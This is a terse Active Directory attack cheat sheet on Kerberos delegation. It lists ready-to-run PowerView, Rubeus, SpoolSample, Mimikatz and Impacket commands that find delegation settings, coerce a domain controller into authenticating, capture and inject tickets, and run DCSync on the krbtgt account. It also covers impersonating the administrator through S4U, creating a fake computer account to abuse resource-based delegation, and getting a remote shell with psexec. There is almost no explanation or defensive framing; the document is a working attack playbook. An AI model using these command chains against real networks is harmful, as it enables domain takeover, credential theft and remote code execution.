Delegation Attacks

Find unconstrained delegation

Machines that store user TGTs — Compromise = capture tickets

# BloodHound: "Find Computers with Unconstrained Delegation"
# PowerView:
Get-DomainComputer -Unconstrained | Select-Object dnshostname

Exploit unconstrained delegation

Coerce DC to authenticate, capture TGT, use it

# 1. Monitor for TGTs:
.\Rubeus.exe monitor /interval:5

# 2. Coerce DC:
.\SpoolSample.exe $DC_IP $COMPROMISED_HOST

# 3. Use captured ticket:
.\Rubeus.exe ptt /ticket:<base64_ticket>
mimikatz # lsadump::dcsync /domain:domain.local /user:krbtgt

Find constrained delegation

Services allowed to delegate to specific SPNs

Get-DomainUser -TrustedToAuth | Select-Object samaccountname, msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth | Select-Object dnshostname, msds-allowedtodelegateto

Exploit constrained delegation

S4U2Self + S4U2Proxy — Request ticket as any user

# Rubeus:
.\Rubeus.exe s4u /user:svc_sql /rc4:<hash> /impersonateuser:administrator /msdsspn:cifs/target.domain.local /ptt

# Impacket:
impacket-getST -spn cifs/target.domain.local -impersonate administrator domain.local/svc_sql:'Password1'
export KRB5CCNAME=administrator.ccache
impacket-psexec -k -no-pass target.domain.local

Resource-Based Constrained Delegation (RBCD)

If you can write msDS-AllowedToActOnBehalfOfOtherIdentity

# 1. Create computer account:
impacket-addcomputer -computer-name FAKE01 -computer-pass 'Password1' domain.local/user:'password'

# 2. Set RBCD:
impacket-rbcd -delegate-to TARGET$ -delegate-from FAKE01$ -action write domain.local/user:'password'

# 3. Get ticket:
impacket-getST -spn cifs/target.domain.local -impersonate administrator domain.local/FAKE01$:'Password1'
export KRB5CCNAME=administrator.ccache
impacket-psexec -k -no-pass target.domain.local